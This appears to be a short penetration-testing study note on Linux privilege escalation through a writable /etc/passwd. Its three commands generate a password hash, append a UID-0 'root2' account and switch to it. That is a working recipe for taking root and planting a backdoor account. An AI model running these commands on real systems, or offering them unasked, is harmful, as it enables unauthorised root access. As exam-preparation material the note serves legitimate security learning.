// notes/ PrivEsc — Linux
🐧

Etc Passwd Override

For backwards compatibility, password hashes present in /etc/passwd will override the ones stored in the shadow file. If we have write access to /etc/passwd we can simply add a ne…

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/etc-passwd-override

/etc/passwd override

For backwards compatibility, password hashes present in /etc/passwd will override the ones stored in the shadow file. If we have write access to /etc/passwd we can simply add a new root account

code
01openssl passwd adot8
code
01echo "root2:HASH:0:0:root:/bin/bash" >> /etc/passwd
code
01su root2